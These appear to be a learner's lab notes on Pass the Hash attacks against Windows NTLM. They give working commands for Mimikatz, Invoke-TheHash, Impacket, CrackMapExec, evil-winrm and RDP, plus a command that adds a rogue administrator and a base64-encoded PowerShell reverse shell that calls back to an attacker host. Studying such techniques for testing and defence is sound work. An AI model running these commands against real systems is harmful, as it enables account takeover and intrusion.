d4rtht3ll3ctus' root vault

Pass the Hash (PtH)

5 min read

Pass the Hash (PtH) attack is a technique where an attacker uses a password hash instead of the plain text password for authentication

PtH attacks exploit the authentication protocol

Windows NTLM Introduction

Microsoft’s Windows New Technology LAN Manager (NTLM) is a set of security protocols that authenticates users’ identities while also protecting the integrity and confidentiality of their data. NTLM is a single sign-on (SSO) solution that uses a challenge-response protocol to verify the user’s identity without having them provide a password.

Kerberos has taken over as the default authentication mechanism in Windows 2000 and subsequent Active Directory (AD) domains.

NTLM, passwords stored on the server and domain controller are not “salted”

Pass the Hash with Mimikatz (Windows)

sekurlsa::pth

To use this module, we will need the following:

  • /user - The user name we want to impersonate.
  • /rc4 or /NTLM - NTLM hash of the user’s password.
  • /domain - Domain the user to impersonate belongs to. In the case of a local user account, we can use the computer name, localhost, or a dot (.).
  • /run - The program we want to run with the user’s context (if not specified, it will launch cmd.exe).

Pass the Hash from Windows Using Mimikatz:

mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

Pass the Hash with PowerShell Invoke-TheHash (Windows)

collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB

Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

To use this tool, we need to specify the following parameters to execute commands in the target computer:

  • Target - Hostname or IP address of the target.
  • Username - Username to use for authentication.
  • Domain - Domain to use for authentication. This parameter is unnecessary with local accounts or when using the @domain after the username.
  • Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
  • Command - Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.

On windows based attacker machine:

Import-Module .\Invoke-TheHash.psd1
 
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

Invoke-TheHash with WMI

Import-Module .\Invoke-TheHash.psd1

Along with reverse shell payload:

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAzACIALAA4ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

Pass the Hash with Impacket (Linux)

impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

There are several other tools in the Impacket toolkit we can use for command execution using Pass the Hash attacks, such as:

Pass the Hash with CrackMapExec (Linux)

Pass the Hash with CrackMapExec

 crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
  • —local-auth : If we want to perform the same actions but attempt to authenticate to each host in a subnet using the local administrator password hash
  • -x : execute commands

If we run into this issue on a real-world engagement, a great recommendation for the customer is to implement the Local Administrator Password Solution (LAPS), which randomizes the local administrator password and can be configured to have it rotate on a fixed interval.

CrackMapExec - Command Execution

crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

Pass the Hash with evil-winrm (Linux)

 
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

PowerShell remoting

If SMB is blocked or we don’t have administrative rights, we can use this alternative protocol to connect to the target machine.

When using a domain account, we need to include the domain name, for example: administrator@inlanefreight.htb

Pass the Hash with RDP (Linux)

We can perform an RDP PtH attack to gain GUI access to the target system using tools like xfreerdp.

There are a few caveats to this attack:

  • Restricted Admin Mode, which is disabled by default, should be enabled on the target host

This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa with the value of 0. It can be done using the following command:

Enable Restricted Admin Mode to Allow PtH

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Pass the Hash Using RDP

xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

UAC Limits Pass the Hash for Local Accounts

UAC (User Account Control) limits local users’ ability to perform remote administration operations

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, “Administrator”) is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.

There is one exception, if the registry key FilterAdministratorToken (disabled by default) is enabled (value 1), the RID 500 account (even if it is renamed) is enrolled in UAC protection. This means that remote PTH will fail against the machine when using that account.

These settings are only for local administrative accounts. If we get access to a domain account with administrative rights on a computer, we can still use Pass the Hash with that computer. LocalAccountTokenFilterPolicy : Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy

Graph View